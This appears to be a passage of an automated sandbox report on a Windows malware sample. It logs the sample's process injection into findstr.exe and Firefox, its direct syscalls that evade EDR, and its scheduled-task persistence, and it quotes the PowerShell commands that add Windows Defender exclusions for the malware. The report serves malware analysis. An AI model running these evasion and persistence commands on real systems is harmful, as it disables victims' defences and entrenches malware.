Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01654A35 mov eax, dword ptr fs:[00000030h]	10_2_01654A35
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01654A35 mov eax, dword ptr fs:[00000030h]	10_2_01654A35
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166CA38 mov eax, dword ptr fs:[00000030h]	10_2_0166CA38
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BCA11 mov eax, dword ptr fs:[00000030h]	10_2_016BCA11
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166AAEE mov eax, dword ptr fs:[00000030h]	10_2_0166AAEE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166AAEE mov eax, dword ptr fs:[00000030h]	10_2_0166AAEE
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01686ACC mov eax, dword ptr fs:[00000030h]	10_2_01686ACC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01686ACC mov eax, dword ptr fs:[00000030h]	10_2_01686ACC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01686ACC mov eax, dword ptr fs:[00000030h]	10_2_01686ACC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630AD0 mov eax, dword ptr fs:[00000030h]	10_2_01630AD0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01664AD0 mov eax, dword ptr fs:[00000030h]	10_2_01664AD0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01664AD0 mov eax, dword ptr fs:[00000030h]	10_2_01664AD0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638AA0 mov eax, dword ptr fs:[00000030h]	10_2_01638AA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638AA0 mov eax, dword ptr fs:[00000030h]	10_2_01638AA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01686AA4 mov eax, dword ptr fs:[00000030h]	10_2_01686AA4
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80 mov eax, dword ptr fs:[00000030h]	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01704A80 mov eax, dword ptr fs:[00000030h]	10_2_01704A80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01668A90 mov edx, dword ptr fs:[00000030h]	10_2_01668A90
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C8D6B mov eax, dword ptr fs:[00000030h]	10_2_016C8D6B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630D59 mov eax, dword ptr fs:[00000030h]	10_2_01630D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630D59 mov eax, dword ptr fs:[00000030h]	10_2_01630D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630D59 mov eax, dword ptr fs:[00000030h]	10_2_01630D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638D59 mov eax, dword ptr fs:[00000030h]	10_2_01638D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638D59 mov eax, dword ptr fs:[00000030h]	10_2_01638D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638D59 mov eax, dword ptr fs:[00000030h]	10_2_01638D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638D59 mov eax, dword ptr fs:[00000030h]	10_2_01638D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01638D59 mov eax, dword ptr fs:[00000030h]	10_2_01638D59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B8D20 mov eax, dword ptr fs:[00000030h]	10_2_016B8D20
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164AD00 mov eax, dword ptr fs:[00000030h]	10_2_0164AD00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164AD00 mov eax, dword ptr fs:[00000030h]	10_2_0164AD00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164AD00 mov eax, dword ptr fs:[00000030h]	10_2_0164AD00

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	NtTerminateThread: Direct from: 0x77377B2E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Memory written: C:\Users\user\Desktop\8SxJ9aYfJ1.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Memory written: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: NULL target: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Section loaded: NULL target: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: NULL target: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: NULL target: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: NULL target: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe protection: execute and read and write
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\findstr.exe

Thread register set: target process: 7012

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\findstr.exe

Thread APC queued: target process: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process created: C:\Users\user\Desktop\8SxJ9aYfJ1.exe "C:\Users\user\Desktop\8SxJ9aYfJ1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe	Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"

Source: sbJGUdSMCgtLQJ.exe, 00000011.00000000.2315637132.0000000001750000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4528531504.0000000001751000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000000.2432988904.0000000001801000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: sbJGUdSMCgtLQJ.exe, 00000011.00000000.2315637132.0000000001750000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4528531504.0000000001751000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000000.2432988904.0000000001801000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: sbJGUdSMCgtLQJ.exe, 00000011.00000000.2315637132.0000000001750000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4528531504.0000000001751000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000000.2432988904.0000000001801000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: sbJGUdSMCgtLQJ.exe, 00000011.00000000.2315637132.0000000001750000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000011.00000002.4528531504.0000000001751000.00000002.00000001.00040000.00000000.sdmp, sbJGUdSMCgtLQJ.exe, 00000013.00000000.2432988904.0000000001801000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Users\user\Desktop\8SxJ9aYfJ1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
